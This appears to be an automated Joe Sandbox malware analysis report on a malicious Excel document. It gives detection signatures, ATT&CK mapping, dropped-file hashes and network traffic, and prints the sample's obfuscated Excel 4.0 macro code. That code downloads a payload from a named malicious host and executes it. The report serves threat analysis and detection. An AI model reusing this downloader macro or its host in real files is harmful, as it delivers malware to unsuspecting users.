Analysis Report SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665
Overview
General Information
Sample Name: | SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665 (renamed file extension from 3665 to xls) |
Analysis ID: | 383014 |
MD5: | a7c64329efaea29a2dc97ced238490f7 |
SHA1: | 5d4b9b386354444cf74fd858e3409f0294c45330 |
SHA256: | 8ee305eec94aaef24116983ceef933359fb860ab50787b7963c3f46fe751630c |
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for dropped file |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for submitted file |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
MITRE ATT&CK Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
13% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
22% | Virustotal | Browse | ||
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak | ||
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
4% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
13% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | low | ||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383014 |
Start date: | 07.04.2021 |
Start time: | 05:53:16 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 21s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665 (renamed file extension from 3665 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: | |
HCA Information: | |
Cookbook Comments: | |
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
05:53:40 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
192.232.249.186 | Get hash | malicious | Browse | | |
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
revolet-sa.com | Get hash | malicious | Browse | | |
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse | | |
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | | ||
Get hash | malicious | Browse | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\sdbybsd.fds | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67965 |
Entropy (8bit): | 7.8795190850591 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70f:LqeRrW2JyW32AiHD2sTU2yF70f |
MD5: | ACD684D03FB00D3EDE4EF36D090E2892 |
SHA1: | 98C38FA7130CE3ADF7656D7C9E1410051C7DF775 |
SHA-256: | 007AD2692E7E4E40D9D9AACF2F68D1B7956DF881C8D0AF2B41569950BF2CA4ED |
SHA-512: | BFE2AD8D06CFCD31845728428CFF7F89748B8CF4A172872D0C85ACBE912A53858A3A90FB180EEDA81294821C029B1413DA9397F814889C2074368EDA35727EB8 |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 6.992231725533755 |
Encrypted: | false |
SSDEEP: | 24:NKf5b6UkxAB8LRnbAwdZhE8/mHeYKf5b6UKjqA6YYUWG538Mhh5FB5tFId4UcP0z:Kb6UH8Ltk1Mm+Bb6UFAH6mBFBS4UcLuj |
MD5: | A9C113D8B90FCF3F0B90699048A6D136 |
SHA1: | D3764B8EA6F98EE7B6768F32F9AC504B8F5397B5 |
SHA-256: | 239AD9A1493D03A978E94CE064598C68D4F82056886C0D403477B63317260AC9 |
SHA-512: | FDFFE41FE43B9A4789053909A610C4AAE1F974E6D818D5D685D2CAA99BEE15F949089A25F4AB416381784F3B4625F145C99CA051188BB79593DAF8C9BBDAEB53 |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.475918729490231 |
Encrypted: | false |
SSDEEP: | 12:85QZ+cLgXg/XAlCPCHaXtB8XzB/RUvX+WnicvbwbDtZ3YilMMEpxRljKlcTdJP9O:85A+K/XTd6j0YegDv3qfrNru/ |
MD5: | 44C685D9F27C5D4389C82A76E63BE69C |
SHA1: | 29408FEA1972853446414948D64054ECBCBA3D0E |
SHA-256: | BA1D65408DD9BA2B20995E2A49F823D7F4F968CA65B8D477F0531A9744881509 |
SHA-512: | 9298E13DC3CA5BAF93E20E631B1E903EDAE998891D1A9DB58BA96CE9F08032593E6EB03F01860477AC9B84CC0267770F42E07868E0E3439DD0BC2925A6F20CBE |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2318 |
Entropy (8bit): | 4.573810904271115 |
Encrypted: | false |
SSDEEP: | 48:8T/XT0jtH+NAHNfQh2T/XT0jtH+NAHNfQ/:8T/XojtcmfQh2T/XojtcmfQ/ |
MD5: | 7A6712A397C39A608B402FB08F51D055 |
SHA1: | 708B6D4ACCF27C74C2E2A541B14B95FC32FCF065 |
SHA-256: | 1CF0635DFA3533DBB3CA1CE8B5A5C80FDA4E0C2038049B36F1554FA851B12BD9 |
SHA-512: | 872C25D4E8D9FC1A7D020E2D379BA9C08B13C3ACAA49CC5A18C8E2DD1C4F21B572CA330D84BDF34A6AE4E4401A56A7CBF7609BF8F0C0B49527C0C2B531478730 |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 170 |
Entropy (8bit): | 4.888657403242958 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0b3kVsLBVouscb3kVsLBVomM0b3kVsLBVov:dj60gVsLBVVgVsLBV60gVsLBVy |
MD5: | 77A0BBADB3E68BC0A632C215D9A38372 |
SHA1: | D2F8B90CBAFB167744DF998488137E83FADB51F4 |
SHA-256: | 999982418F347FD2A25818225C5B61106CA2B8C16F3558C45251E4C228E75C9D |
SHA-512: | C32CCAA1D4E1E47813CEACD4F25C158A004917AD4B315AFB24CCD79A37A5E0E4A966560F36432B47184ADF869F86854E8C3A95F1F3FD1085B2EB1BBD953EAABF |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230390922283029 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSi2jTUqyF70Si2W2vXmwgvXmw3I8rmjo:G8rmjAItyzElBIL6lECbgBvP5NmuCShR |
MD5: | 435860799AF28567EABD1AEC443E69B0 |
SHA1: | D6950FED25AB8CEC5E1DAA1AF55F82CF1A6EBD58 |
SHA-256: | 54CBCFCA263513798A7D7C63CCFDAD67CDB987B966E6CFB22F26212AEDFFC814 |
SHA-512: | 9EA1B2DF35800E7B24DC09D18E2F91D9760641812FDBD72310F071503C2DA1F5B5F859315F3EA4B4BE06D9CBAFC77B3A7EB1E3AB0E9B6042FCD5D1D462332774 |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Reputation: | low |
Preview: | |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.087349849990019 |
TrID: | |
File name: | SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls |
File size: | 267776 |
MD5: | a7c64329efaea29a2dc97ced238490f7 |
SHA1: | 5d4b9b386354444cf74fd858e3409f0294c45330 |
SHA256: | 8ee305eec94aaef24116983ceef933359fb860ab50787b7963c3f46fe751630c |
SHA512: | f7be46dad7af7216a65c5a58766eb20a2e847a787ddb19f9b6520d7e5c81836c8382911743ab13ad171145aadddaa1a43a05c93c5ba3b287d862cf3045bc1dbf |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0+:Fh+ |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.348065102689 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.24280443857 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Macro 4.0 Code |
---|
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 05:54:07.267561913 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.429316044 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.429465055 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.430265903 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.591984034 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.883936882 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.883990049 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884031057 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
